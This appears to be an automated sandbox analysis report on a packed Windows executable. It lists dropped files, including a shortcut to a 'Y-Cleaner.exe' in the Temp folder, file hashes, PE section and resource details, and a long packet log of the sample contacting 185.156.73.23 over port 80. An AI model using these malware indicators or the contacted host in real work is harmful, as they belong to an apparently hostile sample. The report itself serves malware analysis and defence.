                                                    SHA-512:5B5053EE73876D39FE36F61771A0D44A3D2FCC42A81D6C898000CC8BC4D30AAEC6412EAF577B8C4189D94562CE3D69E13D8FE9AB5A78A4D8FBFC2056199FFA6F
                                                    Malicious:false
                                                    Preview:L..................F.@.. .....1..S....1..S....1..S..........................:.:..DG..Yr?.D..U..k0.&...&......Qg.*_....(G9.R..q.9..S......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.Y.}..........................3*N.A.p.p.D.a.t.a...B.P.1......Y.}..Local.<......EW.=.Y.}..........................#.\.L.o.c.a.l.....N.1......Y.}..Temp..:......EW.=.Y.}..........................t.t.T.e.m.p.....v.1......Y....WS4FYW~1..^......Y...Y.......&.......................w.s.4.F.Y.w.8.3.3.3.G.1.0.1.Y.e.d.e.z.S.e.e.....h.2......Y.. .Y-CLEA~1.EXE..L......Y...Y......^'....................w...Y.-.C.l.e.a.n.e.r...e.x.e.......y...............-.......x...........n.._.....C:\Users\user\AppData\Local\Temp\ws4FYw8333G101YedezSee\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.:.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.w.s.4.F.Y.w.8.3.3.3.G.1.0.1.Y.e.d.e.z.S.e.e.\.Y.-.C.l.e.a.n.e.r...e.x.e.I.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p

                                                    C:\Windows\appcompat\Programs\Amcache.hve

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                    File Type:MS Windows registry file, NT/2000 or above
                                                    Category:dropped
                                                    Size (bytes):1835008
                                                    Entropy (8bit):4.4166422139083545
                                                    Encrypted:false
                                                    SSDEEP:6144:kcifpi6ceLPL9skLmb0moSWSPtaJG8nAgex285i2MMhA20X4WABlGuNB5+:Ji58oSWIZBk2MM6AFBHo
                                                    MD5:604BA659C52007BC44A6A2BC2836F630
                                                    SHA1:0D3538EFA69B628339364F0C11FD9AC534201339
                                                    SHA-256:D1B2101142F9BDABA6D9F274D0189293F865B2F1B3F783384E89DA5D9806BDB8
                                                    SHA-512:1DA3A698B68179DA91CC167C261517D2FE515D42AB0A642A0EC9673174DFE1D867821F7A6E27FFEBB89FE66CDDBCD47E5688347C3F33D4171CDFA3CB86DEEA95
                                                    Malicious:false
                                                    Preview:regfE...E....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmV.{..S...............................................................................................................................................................................................................................................................................................................................................sl.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    Static File Info

                                                    General

                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Entropy (8bit):7.94250388727436
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:tXEKP1ThBP.exe
                                                    File size:1'885'184 bytes
                                                    MD5:6d81636af92fae98c45898823e103e4f
                                                    SHA1:00de607eb0d08dd7936211f25ea4019443e52dd1
                                                    SHA256:18d3935ee40dffa59b390df8f2544c8a08ab9d5f997b57940b843356127ead92
                                                    SHA512:21d17f4707521de24258fdb3dbd35b8a2ad17833c286a0d153e9a19a6f57ba52443bbf665af2ffdc067b2872dd71239dd79b5c0b5967d3ef1bad9f7825ec6bbe
                                                    SSDEEP:49152:68r/m5hvfYMDdSb3mwBU32R86KF+aZTZR757Tq0Ze:6i6v7ImwBUmRtMTZR79Tq0Z
                                                    TLSH:F09533CBE8F7676CD467433279AE24563AE16D81B912452CB13E8B648C3F6C332D5C98
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i..............nG@......ZR......ZC......ZU......................Z\......ZB......ZG.....Rich....................PE..L....,.e...

                                                    File Icon

                                                    Icon Hash:e7a99a8a8651790c

                                                    Static PE Info

                                                    General

                                                    Entrypoint:0xc3d000
                                                    Entrypoint Section:.taggant
                                                    Digitally signed:false
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                    Time Stamp:0x65B12CA8 [Wed Jan 24 15:28:40 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:5
                                                    OS Version Minor:0
                                                    File Version Major:5
                                                    File Version Minor:0
                                                    Subsystem Version Major:5
                                                    Subsystem Version Minor:0
                                                    Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                    Entrypoint Preview

                                                    Instruction
                                                    jmp 00007F77011A7B6Ah
                                                    cpuid
                                                    sbb al, 00h
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    jmp 00007F77011A9B65h
                                                    add byte ptr [ecx], al
                                                    or al, byte ptr [eax]
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], dh
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [edx], ah
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], cl
                                                    add byte ptr [eax], 00000000h
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    adc byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add dword ptr [edx], ecx
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al
                                                    add byte ptr [eax], al

                                                    Rich Headers

                                                    Programming Language:
                                                    • [C++] VS2008 build 21022
                                                    • [ASM] VS2008 build 21022
                                                    • [ C ] VS2008 build 21022
                                                    • [IMP] VS2005 build 50727
                                                    • [RES] VS2008 build 21022
                                                    • [LNK] VS2008 build 21022

                                                    Data Directories

                                                    NameVirtual AddressVirtual Size Is in Section
                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x41805b0x6f.idata
                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x40d0000xaea0.rsrc
                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_TLS0x834f040x18skpvkuay
                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                    Sections

                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                    0x10000x40c0000x24e0046baa1783e65684b5f8a7a453c999850unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .rsrc0x40d0000xaea00x7000e045d7c3645c3ba612531967f073e6fdFalse0.9675990513392857data7.898784896089978IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .idata 0x4180000x10000x200b8539b83d0b3f253ed2a56b71af0554bFalse0.154296875data1.085758102617974IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    0x4190000x2860000x200f788d03a71c895b5390e6cd2e31bcf21unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    skpvkuay0x69f0000x19d0000x19cc00d7943eba5b2bf79b0cf14878a1045c40False0.9900912325863114data7.949037345082028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    mnttizsq0x83c0000x10000x400f6db730242ded2cfb3c951ff5f4dde4dFalse0.724609375data5.735212791599164IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                    .taggant0x83d0000x30000x22004b56e7b98dc5ac92cc352472a0f4e8faFalse0.06399356617647059DOS executable (COM)0.6564238719688543IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                    Resources

                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                    RT_ICON0x834f640xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTurkmenTurkmenistan0.7971748400852878
                                                    RT_ICON0x835e0c0x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTurkmenTurkmenistan0.7838447653429603
                                                    RT_ICON0x8366b40x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTurkmenTurkmenistan0.7200460829493087
                                                    RT_ICON0x836d7c0x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTurkmenTurkmenistan0.740606936416185
                                                    RT_ICON0x8372e40x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216TurkmenTurkmenistan0.6840248962655602
                                                    RT_ICON0x83988c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096TurkmenTurkmenistan0.7345215759849906
                                                    RT_ICON0x83a9340x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304TurkmenTurkmenistan0.7622950819672131
                                                    RT_ICON0x83b2bc0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024TurkmenTurkmenistan0.8111702127659575
                                                    RT_STRING0x413c800x330data0.8357843137254902
                                                    RT_STRING0x413fb00x170data0.15
                                                    RT_STRING0x4141200x620empty0
                                                    RT_STRING0x4147400x762empty0
                                                    RT_STRING0x414ea40x852empty0
                                                    RT_STRING0x4156f80x726empty0
                                                    RT_STRING0x415e200x658empty0
                                                    RT_STRING0x4164780x6c0empty0
                                                    RT_STRING0x416b380x638empty0
                                                    RT_STRING0x4171700x88aempty0
                                                    RT_ACCELERATOR0x4179fc0x20empty0
                                                    RT_GROUP_ICON0x83b7240x76dataTurkmenTurkmenistan0.6610169491525424
                                                    RT_VERSION0x83b79a0x1b4data0.5711009174311926
                                                    RT_MANIFEST0x83b94e0x256ASCII text, with CRLF line terminators0.5100334448160535

                                                    Imports

                                                    DLLImport
                                                    kernel32.dlllstrcpy

                                                    Possible Origin

                                                    Language of compilation systemCountry where language is spokenMap
                                                    TurkmenTurkmenistan

                                                    Network Behavior

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 20, 2024 16:46:10.445839882 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:10.566183090 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:10.566271067 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:10.567471027 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:10.687072992 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:11.927460909 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:11.927556992 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:11.944957972 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:12.064748049 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:12.424144983 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:12.424237013 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:12.430010080 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:12.550275087 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:12.987807989 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:12.987818956 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:12.987878084 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:12.988276958 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:12.988338947 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:12.988374949 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:12.988387108 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:12.988409996 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:12.988424063 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:12.988820076 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:12.988831043 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:12.988842010 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:12.988876104 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:12.988903046 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:12.989306927 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:12.989352942 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:12.997651100 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:12.997703075 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:12.998359919 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:12.998411894 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.003674984 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.003722906 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.107645988 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.107716084 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.179107904 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.179321051 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.179415941 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.182914972 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.184520006 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.184530973 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.184674978 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.192502022 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.192857027 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.192922115 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.200364113 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.200617075 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.200668097 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.208396912 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.208462000 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.208690882 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.210242033 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.216495037 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.216871023 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.216917992 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.224258900 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.224313974 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.224582911 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.225260019 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.232410908 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.232460976 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.232625008 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.232901096 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.240309000 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.240644932 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.241415977 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.241461992 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.248291969 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.248348951 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.248402119 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.248436928 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.255989075 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.256038904 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.256210089 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.256253004 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.263587952 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.263641119 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.300216913 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.300273895 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.300467014 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.300621986 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.371541023 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.371999979 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.372076988 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.374258041 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.374377966 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.374433041 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.378421068 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.378592014 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.378647089 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.383177042 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.383347988 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.383399010 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.387967110 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.387981892 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.388125896 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.392566919 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.392618895 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.392764091 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.394248962 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.397012949 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.397646904 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.397700071 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.401503086 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.401623964 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.401669025 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.405909061 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.406136036 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.406203985 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.410495996 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.411076069 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.411130905 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.415987015 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.415998936 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.416042089 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.419620991 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.419735909 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.420682907 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.423975945 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.424074888 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.424141884 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.428586006 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.428854942 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.428920031 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.433062077 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.433608055 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.433744907 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.436593056 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.437279940 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.437325001 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.440140009 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.440610886 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.440648079 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.443789005 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.443876028 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.444324970 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.447177887 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.447330952 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.447571993 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.447710037 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.450738907 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.451016903 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.451078892 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.454227924 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.454312086 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.455347061 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.457741022 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.457820892 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.458275080 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.475671053 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:13.595254898 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.972539902 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:13.972724915 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:15.986310005 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:16.106060028 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:16.474724054 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:16.474896908 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:18.502207994 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:18.621855974 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:19.006123066 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:19.006180048 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:21.033771992 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:21.153520107 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:21.526840925 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:21.530417919 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:23.548841953 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:23.668520927 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:24.035531044 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:24.035671949 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:26.048862934 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:26.168448925 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:26.545330048 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:26.545491934 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:28.564697027 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:28.684951067 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:29.049945116 CET8049729185.156.73.23192.168.2.7
                                                    Dec 20, 2024 16:46:29.050065041 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:31.493660927 CET4972980192.168.2.7185.156.73.23
                                                    Dec 20, 2024 16:46:31.613259077 CET8049729185.156.73.23192.168.2.7
